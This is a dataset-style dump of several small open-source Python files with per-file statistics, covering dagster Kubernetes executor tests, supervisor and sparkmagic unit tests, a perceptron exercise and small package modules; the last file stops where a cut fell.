| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
3f694ebcadc8a4ed2b0472121f529e4d33f9e214
| 117
|
py
|
Python
|
maelstrom/__init__.py
|
maelstromio/maelstrom-py
|
b88e73496195d59960c2cff43b97aa6329d39f48
|
[
"MIT"
] | null | null | null |
maelstrom/__init__.py
|
maelstromio/maelstrom-py
|
b88e73496195d59960c2cff43b97aa6329d39f48
|
[
"MIT"
] | null | null | null |
maelstrom/__init__.py
|
maelstromio/maelstrom-py
|
b88e73496195d59960c2cff43b97aa6329d39f48
|
[
"MIT"
] | null | null | null |
import db_utils as db
def connect(cass_ip, cass_kp):
db.connect(cass_ip, cass_kp)
def close():
db.close()
| 13
| 32
| 0.683761
| 21
| 117
| 3.571429
| 0.47619
| 0.293333
| 0.346667
| 0.453333
| 0.506667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.196581
| 117
| 9
| 33
| 13
| 0.797872
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0.2
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
58b3a2cd01c83d705550b7654bb9d686133f8d2f
| 42
|
py
|
Python
|
AprendendoPOO/if __name__2.py
|
BrunoRibeiro-P/Curso-De-POO-em-Python
|
cbbdc9fa542fc2ace2c02e290b346f1344f03c98
|
[
"MIT"
] | null | null | null |
AprendendoPOO/if __name__2.py
|
BrunoRibeiro-P/Curso-De-POO-em-Python
|
cbbdc9fa542fc2ace2c02e290b346f1344f03c98
|
[
"MIT"
] | null | null | null |
AprendendoPOO/if __name__2.py
|
BrunoRibeiro-P/Curso-De-POO-em-Python
|
cbbdc9fa542fc2ace2c02e290b346f1344f03c98
|
[
"MIT"
] | null | null | null |
from name import soma
print(soma(10, 20))
| 14
| 21
| 0.738095
| 8
| 42
| 3.875
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.111111
| 0.142857
| 42
| 3
| 22
| 14
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0.5
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 6
|
58fd28c2ce52d6134d6010d2175d9672c29703f8
| 59
|
py
|
Python
|
arbalest/configuration.py
|
Dwolla/arbalest
|
5516aa11a24012a6222acc3b583261ff90ee450f
|
[
"MIT"
] | 46
|
2015-11-01T19:37:46.000Z
|
2021-04-14T02:41:10.000Z
|
arbalest/configuration.py
|
Dwolla/arbalest
|
5516aa11a24012a6222acc3b583261ff90ee450f
|
[
"MIT"
] | 1
|
2016-04-20T16:56:44.000Z
|
2016-04-20T16:56:44.000Z
|
arbalest/configuration.py
|
Dwolla/arbalest
|
5516aa11a24012a6222acc3b583261ff90ee450f
|
[
"MIT"
] | 9
|
2015-10-31T23:01:50.000Z
|
2021-08-02T21:15:25.000Z
|
import os
def env(name):
return os.environ.get(name)
| 9.833333
| 31
| 0.677966
| 10
| 59
| 4
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.20339
| 59
| 5
| 32
| 11.8
| 0.851064
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
45100a02c292063c012c3d5cb0c0ffff43855e75
| 1,590
|
py
|
Python
|
Neural network/perceptron.py
|
radosnystudent/Introduction-to-Neural-network
|
a641f1a04885354fd3888df02c38bd8315979e04
|
[
"MIT"
] | null | null | null |
Neural network/perceptron.py
|
radosnystudent/Introduction-to-Neural-network
|
a641f1a04885354fd3888df02c38bd8315979e04
|
[
"MIT"
] | null | null | null |
Neural network/perceptron.py
|
radosnystudent/Introduction-to-Neural-network
|
a641f1a04885354fd3888df02c38bd8315979e04
|
[
"MIT"
] | null | null | null |
def f(w : list, u : list, m : int) -> int:
x = float(0)
for i in range(m):
x += (w[i]*u[i])
if x < 0.0:
return 0
return 1
def perceptron(u : list, c : float):
wt = [1.0 for _ in range(26)]
t = 1
counter = 0
while counter < 5:
zt = 1 if t % 5 < 3 else 0
yt = f(wt, u[(t-1) % 5], len(wt))
for i in range(26):
wt[i] += c*(zt - yt)*u[(t-1) % 5][i]
t += 1
if zt == yt:
counter += 1
else:
counter = 0
print(f't: {t}')
for ind, value in enumerate(wt):
print(f'w[{ind}] : {value}')
print('\n')
def main():
u = list()
u.append([1.0 if x in [6,7,12,17,22,25] else 0.0 for x in range(26)])
u.append([1.0 if x in [2,3,8,13,25] else 0.0 for x in range(26)])
u.append([1.0 if x in [5,6,11,16,21,25] else 0.0 for x in range(26)])
u.append([1.0 if x in [6,7,8,11,13,16,17,18,25] else 0.0 for x in range(26)])
u.append([1.0 if x in [10,11,12,15,17,20,21,22,25] else 0.0 for x in range(26)])
for c in [1.0, 0.1, 0.01]:
perceptron(u, c)
if __name__ == '__main__':
main()
"""
u1 = [0 0 0 0 0
0 1 1 0 0
0 0 1 0 0
0 0 1 0 0
0 0 1 0 0 1]
u2 = [0 0 1 1 0
0 0 0 1 0
0 0 0 1 0
0 0 0 0 0
0 0 0 0 0 1]
u3 = [0 0 0 0 0
1 1 0 0 0
0 1 0 0 0
0 1 0 0 0
0 1 0 0 0 1]
u4 = [0 0 0 0 0
0 1 1 1 0
0 1 0 1 0
0 1 1 1 0
0 0 0 0 0 1]
u5 = [0 0 0 0 0
0 0 0 0 0
1 1 1 0 0
1 0 1 0 0
1 1 1 0 0 1]
"""
| 19.156627
| 84
| 0.431447
| 374
| 1,590
| 1.81016
| 0.160428
| 0.230428
| 0.217134
| 0.200886
| 0.468242
| 0.45938
| 0.45938
| 0.451994
| 0.44904
| 0.422452
| 0
| 0.275751
| 0.413836
| 1,590
| 83
| 85
| 19.156627
| 0.450644
| 0
| 0
| 0.055556
| 0
| 0
| 0.029185
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.083333
| false
| 0
| 0
| 0
| 0.138889
| 0.083333
| 0
| 0
| 1
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
18ba3534e06462178884eaa99455cc5ef09320d9
| 168
|
py
|
Python
|
tracadvsearch/__init__.py
|
dnephin/TracAdvancedSearchPlugin
|
b48426bc3f0a843e822783224d316aaf4c3286b5
|
[
"ISC"
] | 6
|
2015-02-19T19:22:10.000Z
|
2019-04-04T16:08:40.000Z
|
tracadvsearch/__init__.py
|
dnephin/TracAdvancedSearchPlugin
|
b48426bc3f0a843e822783224d316aaf4c3286b5
|
[
"ISC"
] | 1
|
2017-02-12T07:02:05.000Z
|
2017-02-12T07:02:05.000Z
|
tracadvsearch/__init__.py
|
dnephin/TracAdvancedSearchPlugin
|
b48426bc3f0a843e822783224d316aaf4c3286b5
|
[
"ISC"
] | 3
|
2016-03-16T16:10:10.000Z
|
2020-12-07T21:50:49.000Z
|
from advsearch import SearchBackendException
from advsearch import AdvancedSearchPlugin
from backend import PySolrSearchBackEnd
from interface import IAdvSearchBackend
| 33.6
| 44
| 0.904762
| 16
| 168
| 9.5
| 0.5625
| 0.171053
| 0.25
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.095238
| 168
| 4
| 45
| 42
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
18e1d8174c771757f2928978ab5bbdf82b46fe2a
| 11,658
|
py
|
Python
|
integration_tests/test_suites/k8s-integration-test-suite/test_executor.py
|
NicolasPA/dagster
|
948bfc7b5582230417465b5662bd9f907c0e51c9
|
[
"Apache-2.0"
] | 1
|
2021-07-03T09:05:58.000Z
|
2021-07-03T09:05:58.000Z
|
integration_tests/test_suites/k8s-integration-test-suite/test_executor.py
|
NicolasPA/dagster
|
948bfc7b5582230417465b5662bd9f907c0e51c9
|
[
"Apache-2.0"
] | null | null | null |
integration_tests/test_suites/k8s-integration-test-suite/test_executor.py
|
NicolasPA/dagster
|
948bfc7b5582230417465b5662bd9f907c0e51c9
|
[
"Apache-2.0"
] | null | null | null |
import datetime
import os
import time
import pytest
from dagster import check
from dagster.core.storage.pipeline_run import PipelineRunStatus
from dagster.core.storage.tags import DOCKER_IMAGE_TAG
from dagster.core.test_utils import create_run_for_test
from dagster.utils import load_yaml_from_path, merge_dicts
from dagster_k8s.client import DagsterKubernetesClient
from dagster_k8s.launcher import K8sRunLauncher
from dagster_k8s.test import wait_for_job_and_get_raw_logs
from dagster_k8s.utils import wait_for_job
from dagster_k8s_test_infra.helm import TEST_AWS_CONFIGMAP_NAME
from dagster_k8s_test_infra.integration_utils import image_pull_policy
from dagster_test.test_project import (
IS_BUILDKITE,
ReOriginatedExternalPipelineForTest,
get_test_project_docker_image,
get_test_project_environments_path,
get_test_project_location_and_external_pipeline,
)
@pytest.mark.integration
def test_k8s_run_launcher_default(
dagster_instance_for_k8s_run_launcher, helm_namespace_for_k8s_run_launcher, dagster_docker_image
):
# sanity check that we have a K8sRunLauncher
check.inst(dagster_instance_for_k8s_run_launcher.run_launcher, K8sRunLauncher)
pods = DagsterKubernetesClient.production_client().core_api.list_namespaced_pod(
namespace=helm_namespace_for_k8s_run_launcher
)
celery_pod_names = [p.metadata.name for p in pods.items if "celery-workers" in p.metadata.name]
check.invariant(not celery_pod_names)
run_config = merge_dicts(
load_yaml_from_path(os.path.join(get_test_project_environments_path(), "env.yaml")),
load_yaml_from_path(os.path.join(get_test_project_environments_path(), "env_s3.yaml")),
{
"execution": {
"k8s": {
"config": {
"job_namespace": helm_namespace_for_k8s_run_launcher,
"job_image": dagster_docker_image,
"image_pull_policy": image_pull_policy(),
"env_config_maps": ["dagster-pipeline-env"]
+ ([TEST_AWS_CONFIGMAP_NAME] if not IS_BUILDKITE else []),
}
}
},
},
)
pipeline_name = "demo_k8s_executor_pipeline"
tags = {"key": "value"}
with get_test_project_location_and_external_pipeline(pipeline_name) as (
location,
external_pipeline,
):
run = create_run_for_test(
dagster_instance_for_k8s_run_launcher,
pipeline_name=pipeline_name,
run_config=run_config,
tags=tags,
mode="default",
pipeline_snapshot=external_pipeline.pipeline_snapshot,
execution_plan_snapshot=location.get_external_execution_plan(
external_pipeline, run_config, "default", None, None
).execution_plan_snapshot,
)
dagster_instance_for_k8s_run_launcher.launch_run(
run.run_id,
ReOriginatedExternalPipelineForTest(external_pipeline),
)
result = wait_for_job_and_get_raw_logs(
job_name="dagster-run-%s" % run.run_id, namespace=helm_namespace_for_k8s_run_launcher
)
assert "PIPELINE_SUCCESS" in result, "no match, result: {}".format(result)
updated_run = dagster_instance_for_k8s_run_launcher.get_run_by_id(run.run_id)
assert updated_run.tags[DOCKER_IMAGE_TAG] == get_test_project_docker_image()
@pytest.mark.integration
def test_k8s_run_launcher_image_from_origin(
dagster_instance_for_k8s_run_launcher, helm_namespace_for_k8s_run_launcher, dagster_docker_image
):
# Like the previous test, but the executor doesn't supply an image - it's pulled
# from the origin (see get_test_project_location_and_external_pipeline below) instead
check.inst(dagster_instance_for_k8s_run_launcher.run_launcher, K8sRunLauncher)
pods = DagsterKubernetesClient.production_client().core_api.list_namespaced_pod(
namespace=helm_namespace_for_k8s_run_launcher
)
celery_pod_names = [p.metadata.name for p in pods.items if "celery-workers" in p.metadata.name]
check.invariant(not celery_pod_names)
run_config = merge_dicts(
load_yaml_from_path(os.path.join(get_test_project_environments_path(), "env.yaml")),
load_yaml_from_path(os.path.join(get_test_project_environments_path(), "env_s3.yaml")),
{
"execution": {
"k8s": {
"config": {
"job_namespace": helm_namespace_for_k8s_run_launcher,
"image_pull_policy": image_pull_policy(),
"env_config_maps": ["dagster-pipeline-env"]
+ ([TEST_AWS_CONFIGMAP_NAME] if not IS_BUILDKITE else []),
}
}
},
},
)
pipeline_name = "demo_k8s_executor_pipeline"
tags = {"key": "value"}
with get_test_project_location_and_external_pipeline(pipeline_name, dagster_docker_image) as (
location,
external_pipeline,
):
run = create_run_for_test(
dagster_instance_for_k8s_run_launcher,
pipeline_name=pipeline_name,
run_config=run_config,
tags=tags,
mode="default",
pipeline_snapshot=external_pipeline.pipeline_snapshot,
execution_plan_snapshot=location.get_external_execution_plan(
external_pipeline, run_config, "default", None, None
).execution_plan_snapshot,
)
dagster_instance_for_k8s_run_launcher.launch_run(
run.run_id,
ReOriginatedExternalPipelineForTest(
external_pipeline, container_image=dagster_docker_image
),
)
result = wait_for_job_and_get_raw_logs(
job_name="dagster-run-%s" % run.run_id, namespace=helm_namespace_for_k8s_run_launcher
)
assert "PIPELINE_SUCCESS" in result, "no match, result: {}".format(result)
updated_run = dagster_instance_for_k8s_run_launcher.get_run_by_id(run.run_id)
assert updated_run.tags[DOCKER_IMAGE_TAG] == get_test_project_docker_image()
@pytest.mark.integration
def test_k8s_run_launcher_terminate(
dagster_instance_for_k8s_run_launcher, helm_namespace_for_k8s_run_launcher, dagster_docker_image
):
pipeline_name = "slow_pipeline"
tags = {"key": "value"}
run_config = merge_dicts(
load_yaml_from_path(os.path.join(get_test_project_environments_path(), "env_s3.yaml")),
{
"execution": {
"k8s": {
"config": {
"job_namespace": helm_namespace_for_k8s_run_launcher,
"job_image": dagster_docker_image,
"image_pull_policy": image_pull_policy(),
"env_config_maps": ["dagster-pipeline-env"]
+ ([TEST_AWS_CONFIGMAP_NAME] if not IS_BUILDKITE else []),
}
}
},
},
)
with get_test_project_location_and_external_pipeline(pipeline_name) as (
location,
external_pipeline,
):
run = create_run_for_test(
dagster_instance_for_k8s_run_launcher,
pipeline_name=pipeline_name,
run_config=run_config,
tags=tags,
mode="k8s",
pipeline_snapshot=external_pipeline.pipeline_snapshot,
execution_plan_snapshot=location.get_external_execution_plan(
external_pipeline, run_config, "k8s", None, None
).execution_plan_snapshot,
)
dagster_instance_for_k8s_run_launcher.launch_run(
run.run_id,
ReOriginatedExternalPipelineForTest(external_pipeline),
)
wait_for_job(
job_name="dagster-run-%s" % run.run_id, namespace=helm_namespace_for_k8s_run_launcher
)
timeout = datetime.timedelta(0, 30)
start_time = datetime.datetime.now()
while datetime.datetime.now() < start_time + timeout:
if dagster_instance_for_k8s_run_launcher.run_launcher.can_terminate(run_id=run.run_id):
break
time.sleep(5)
assert dagster_instance_for_k8s_run_launcher.run_launcher.can_terminate(run_id=run.run_id)
assert dagster_instance_for_k8s_run_launcher.run_launcher.terminate(run_id=run.run_id)
start_time = datetime.datetime.now()
pipeline_run = None
while datetime.datetime.now() < start_time + timeout:
pipeline_run = dagster_instance_for_k8s_run_launcher.get_run_by_id(run.run_id)
if pipeline_run.status == PipelineRunStatus.CANCELED:
break
time.sleep(5)
# useful to have logs here, because the worker pods get deleted
print( # pylint: disable=print-call
dagster_instance_for_k8s_run_launcher.all_logs(run.run_id)
)
assert pipeline_run.status == PipelineRunStatus.CANCELED
assert not dagster_instance_for_k8s_run_launcher.run_launcher.terminate(run_id=run.run_id)
@pytest.mark.integration
def test_k8s_executor_resource_requirements(
dagster_instance_for_k8s_run_launcher, helm_namespace_for_k8s_run_launcher, dagster_docker_image
):
# sanity check that we have a K8sRunLauncher
check.inst(dagster_instance_for_k8s_run_launcher.run_launcher, K8sRunLauncher)
pods = DagsterKubernetesClient.production_client().core_api.list_namespaced_pod(
namespace=helm_namespace_for_k8s_run_launcher
)
celery_pod_names = [p.metadata.name for p in pods.items if "celery-workers" in p.metadata.name]
check.invariant(not celery_pod_names)
run_config = merge_dicts(
load_yaml_from_path(os.path.join(get_test_project_environments_path(), "env_s3.yaml")),
{
"execution": {
"k8s": {
"config": {
"job_namespace": helm_namespace_for_k8s_run_launcher,
"job_image": dagster_docker_image,
"image_pull_policy": image_pull_policy(),
"env_config_maps": ["dagster-pipeline-env"]
+ ([TEST_AWS_CONFIGMAP_NAME] if not IS_BUILDKITE else []),
}
}
},
},
)
pipeline_name = "resources_limit_pipeline"
tags = {"key": "value"}
with get_test_project_location_and_external_pipeline(pipeline_name) as (
location,
external_pipeline,
):
run = create_run_for_test(
dagster_instance_for_k8s_run_launcher,
pipeline_name=pipeline_name,
run_config=run_config,
tags=tags,
mode="k8s",
pipeline_snapshot=external_pipeline.pipeline_snapshot,
execution_plan_snapshot=location.get_external_execution_plan(
external_pipeline, run_config, "k8s", None, None
).execution_plan_snapshot,
)
dagster_instance_for_k8s_run_launcher.launch_run(
run.run_id,
ReOriginatedExternalPipelineForTest(external_pipeline),
)
result = wait_for_job_and_get_raw_logs(
job_name="dagster-run-%s" % run.run_id, namespace=helm_namespace_for_k8s_run_launcher
)
assert "PIPELINE_SUCCESS" in result, "no match, result: {}".format(result)
updated_run = dagster_instance_for_k8s_run_launcher.get_run_by_id(run.run_id)
assert updated_run.tags[DOCKER_IMAGE_TAG] == get_test_project_docker_image()
| 39.788396
| 100
| 0.669326
| 1,365
| 11,658
| 5.243223
| 0.111355
| 0.075311
| 0.082157
| 0.092637
| 0.859438
| 0.825765
| 0.816962
| 0.791114
| 0.785245
| 0.783569
| 0
| 0.008533
| 0.256133
| 11,658
| 292
| 101
| 39.924658
| 0.816767
| 0.028907
| 0
| 0.66129
| 0
| 0
| 0.069471
| 0.006717
| 0
| 0
| 0
| 0
| 0.040323
| 1
| 0.016129
| false
| 0
| 0.064516
| 0
| 0.080645
| 0.004032
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
beeb57c30bb79f0670a888c4baecaff22aae0506
| 2,925
|
py
|
Python
|
src/eavatar.ava/tests/unit/test_supervisotr.py
|
eavatar/ava
|
4f09c5417b7187dd919b7edabb8c516d8efc0696
|
[
"BSD-3-Clause"
] | null | null | null |
src/eavatar.ava/tests/unit/test_supervisotr.py
|
eavatar/ava
|
4f09c5417b7187dd919b7edabb8c516d8efc0696
|
[
"BSD-3-Clause"
] | null | null | null |
src/eavatar.ava/tests/unit/test_supervisotr.py
|
eavatar/ava
|
4f09c5417b7187dd919b7edabb8c516d8efc0696
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import print_function, division, absolute_import
import time
import unittest
import mock
from ava.shell.base import Supervisor
def server_process1():
time.sleep(2)
class SupervisorTest(unittest.TestCase):
@mock.patch('ava.shell.base.multiprocessing.Process')
def test_supervisor(self, mock_process_class):
mp = mock_process_class.return_value
mp.exitcode = None
supervisor = Supervisor(target=server_process1)
self.assertFalse(supervisor.is_server_running())
supervisor.start_server()
self.assertTrue(mock_process_class.called)
self.assertTrue(mp.start.called)
self.assertTrue(supervisor.is_server_running())
supervisor.stop_server()
self.assertTrue(mp.terminate.called)
self.assertFalse(supervisor.is_server_running())
@mock.patch('ava.shell.base.multiprocessing.Process')
def test_supervisor_with_server_abnormally_exit(self, mock_process_class):
mp = mock_process_class.return_value
mp.exitcode = None
supervisor = Supervisor(target=server_process1)
self.assertFalse(supervisor.is_server_running())
supervisor.start_server()
self.assertTrue(mock_process_class.called)
self.assertTrue(mp.start.called)
self.assertTrue(supervisor.is_server_running())
# emulate server process exits abnormally.
mp.exitcode = -1
self.assertTrue(supervisor.health_check())
self.assertEqual(mp.start.call_count, 2)
# exitcode = 1 indicates that server requested to restart.
mp.exitcode = 1
self.assertTrue(supervisor.health_check())
self.assertEqual(mp.start.call_count, 3)
# in case that restarting too many times, supervisor should give up.
for i in range(5):
mp.exitcode = -1
supervisor.health_check()
self.assertFalse(supervisor.health_check())
supervisor.stop_server()
self.assertFalse(mp.terminate.called)
self.assertFalse(supervisor.is_server_running())
@mock.patch('ava.shell.base.multiprocessing.Process')
def test_supervisor_with_server_normally_exit(self, mock_process_class):
mp = mock_process_class.return_value
mp.exitcode = None
supervisor = Supervisor(target=server_process1)
self.assertFalse(supervisor.is_server_running())
supervisor.start_server()
self.assertTrue(mock_process_class.called)
self.assertTrue(mp.start.called)
self.assertTrue(supervisor.is_server_running())
# emulate server process exits normally.
mp.exitcode = 0
self.assertFalse(supervisor.health_check())
self.assertEqual(mp.start.call_count, 1)
supervisor.stop_server()
self.assertFalse(mp.terminate.called)
self.assertFalse(supervisor.is_server_running())
| 32.865169
| 78
| 0.699145
| 335
| 2,925
| 5.883582
| 0.226866
| 0.085236
| 0.073059
| 0.114155
| 0.793506
| 0.762557
| 0.762557
| 0.762557
| 0.762557
| 0.736175
| 0
| 0.006477
| 0.208205
| 2,925
| 88
| 79
| 33.238636
| 0.84456
| 0.076923
| 0
| 0.683333
| 0
| 0
| 0.042316
| 0.042316
| 0
| 0
| 0
| 0
| 0.416667
| 1
| 0.066667
| false
| 0
| 0.083333
| 0
| 0.166667
| 0.016667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
beeccdcaefeb59e31aba841d509e1e4bdc818b84
| 28
|
py
|
Python
|
nmrdata/parse/__init__.py
|
mdarrows/whitelab-nmrdata
|
4f92c42ae1aedd15483a34250f41ebd3fa1ab343
|
[
"MIT"
] | 7
|
2021-07-15T19:31:18.000Z
|
2022-03-01T06:58:43.000Z
|
nmrdata/parse/__init__.py
|
mdarrows/whitelab-nmrdata
|
4f92c42ae1aedd15483a34250f41ebd3fa1ab343
|
[
"MIT"
] | 2
|
2021-04-29T14:26:26.000Z
|
2021-11-24T20:50:42.000Z
|
nmrdata/parse/__init__.py
|
mdarrows/whitelab-nmrdata
|
4f92c42ae1aedd15483a34250f41ebd3fa1ab343
|
[
"MIT"
] | 2
|
2021-08-18T00:50:14.000Z
|
2022-03-10T09:42:59.000Z
|
from .main import clean_pdb
| 14
| 27
| 0.821429
| 5
| 28
| 4.4
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 28
| 1
| 28
| 28
| 0.916667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
83023f810b61604e88158d722b5b3e5289b02654
| 11,728
|
py
|
Python
|
sparkmagic/sparkmagic/tests/test_sparkmagicsbase.py
|
viaduct-ai/sparkmagic
|
6acb0967d5d7d600c360fab4db1c28f074de4c71
|
[
"RSA-MD"
] | 1
|
2020-05-26T20:57:43.000Z
|
2020-05-26T20:57:43.000Z
|
sparkmagic/sparkmagic/tests/test_sparkmagicsbase.py
|
viaduct-ai/sparkmagic
|
6acb0967d5d7d600c360fab4db1c28f074de4c71
|
[
"RSA-MD"
] | 2
|
2020-12-08T04:51:29.000Z
|
2021-06-10T18:19:40.000Z
|
sparkmagic/sparkmagic/tests/test_sparkmagicsbase.py
|
viaduct-ai/sparkmagic
|
6acb0967d5d7d600c360fab4db1c28f074de4c71
|
[
"RSA-MD"
] | null | null | null |
# -*- coding: utf-8 -*-
import sparkmagic.utils.configuration as conf
from mock import MagicMock
from nose.tools import with_setup, assert_equals, assert_raises, raises
from sparkmagic.utils.configuration import get_livy_kind
from sparkmagic.utils.constants import LANGS_SUPPORTED, SESSION_KIND_PYSPARK, SESSION_KIND_SPARK, \
IDLE_SESSION_STATUS, BUSY_SESSION_STATUS, MIMETYPE_TEXT_PLAIN, EXPECTED_ERROR_MSG
from sparkmagic.magics.sparkmagicsbase import SparkMagicBase
from sparkmagic.livyclientlib.exceptions import DataFrameParseException, BadUserDataException, SparkStatementException
from sparkmagic.livyclientlib.sqlquery import SQLQuery
from sparkmagic.livyclientlib.sparkstorecommand import SparkStoreCommand
def _setup():
global magic, session, shell, ipython_display
shell = MagicMock()
shell.user_ns = {}
magic = SparkMagicBase(None)
magic.shell = shell
session = MagicMock()
magic.spark_controller = MagicMock()
magic.ipython_display = MagicMock()
conf.override_all({})
def _teardown():
pass
def test_load_emits_event():
spark_events = MagicMock()
SparkMagicBase(None, spark_events=spark_events)
spark_events.emit_library_loaded_event.assert_called_once_with()
def test_get_livy_kind_covers_all_langs():
for lang in LANGS_SUPPORTED:
get_livy_kind(lang)
@with_setup(_setup, _teardown)
def test_sql_df_execution_without_output_var():
df = 0
query = SQLQuery("")
output_var = None
magic.spark_controller.run_sqlquery = MagicMock(return_value=df)
res = magic.execute_sqlquery("", None, None, None, session, output_var, False, None)
magic.spark_controller.run_sqlquery.assert_called_once_with(query, session)
assert res == df
assert_equals(list(shell.user_ns.keys()), [])
@with_setup(_setup, _teardown)
def test_sql_df_execution_with_output_var():
df = 0
query = SQLQuery("")
output_var = "var_name"
magic.spark_controller = MagicMock()
magic.spark_controller.run_sqlquery = MagicMock(return_value=df)
res = magic.execute_sqlquery("", None, None, None, session, output_var, False, None)
magic.spark_controller.run_sqlquery.assert_called_once_with(query, session)
assert res == df
assert shell.user_ns[output_var] == df
@with_setup(_setup, _teardown)
def test_sql_df_execution_quiet_without_output_var():
df = 0
cell = SQLQuery("")
output_var = None
magic.spark_controller = MagicMock()
magic.spark_controller.run_sqlquery = MagicMock(return_value=df)
res = magic.execute_sqlquery("", None, None, None, session, output_var, True, None)
magic.spark_controller.run_sqlquery.assert_called_once_with(cell, session)
assert res is None
assert_equals(list(shell.user_ns.keys()), [])
@with_setup(_setup, _teardown)
def test_sql_df_execution_quiet_with_output_var():
df = 0
cell = SQLQuery("")
output_var = "var_name"
magic.spark_controller = MagicMock()
magic.spark_controller.run_sqlquery = MagicMock(return_value=df)
res = magic.execute_sqlquery("", None, None, None, session, output_var, True, None)
magic.spark_controller.run_sqlquery.assert_called_once_with(cell, session)
assert res is None
assert shell.user_ns[output_var] == df
@with_setup(_setup, _teardown)
def test_sql_df_execution_quiet_with_coerce():
df = 0
cell = SQLQuery("", coerce=True)
output_var = "var_name"
magic.spark_controller = MagicMock()
magic.spark_controller.run_sqlquery = MagicMock(return_value=df)
res = magic.execute_sqlquery("", None, None, None, session, output_var, True, True)
magic.spark_controller.run_sqlquery.assert_called_once_with(cell, session)
assert res is None
assert shell.user_ns[output_var] == df
@with_setup(_setup, _teardown)
def test_print_endpoint_info():
current_session_id = 1
session1 = MagicMock()
session1.id = 1
session1.get_row_html.return_value = u"""<tr><td>row1</td></tr>"""
session2 = MagicMock()
session2.id = 3
session2.get_row_html.return_value = u"""<tr><td>row2</td></tr>"""
magic._print_endpoint_info([session2, session1], current_session_id)
magic.ipython_display.html.assert_called_once_with(u"""<table>
<tr><th>ID</th><th>YARN Application ID</th><th>Kind</th><th>State</th><th>Spark UI</th><th>Driver log</th><th>User</th><th>Current session?</th></tr>\
<tr><td>row1</td></tr><tr><td>row2</td></tr>\
</table>""")
@with_setup(_setup, _teardown)
def test_print_empty_endpoint_info():
current_session_id = None
magic._print_endpoint_info([], current_session_id)
magic.ipython_display.html.assert_called_once_with(u'No active sessions.')
@with_setup(_setup, _teardown)
@raises(BadUserDataException)
def test_send_to_spark_should_raise_when_variable_value_is_none():
input_variable_name = "x_in"
output_variable_name = "x_out"
var_type = "str"
max_rows = 25000
magic.shell.user_ns[input_variable_name] = None
magic.do_send_to_spark("", input_variable_name, var_type, output_variable_name, max_rows, None)
@with_setup(_setup, _teardown)
@raises(BadUserDataException)
def test_send_to_spark_should_raise_when_type_is_incorrect():
input_variable_name = "x_in"
input_variable_value = "x_value"
output_variable_name = "x_out"
var_type = "incorrect"
max_rows = 25000
magic.shell.user_ns[input_variable_name] = input_variable_value
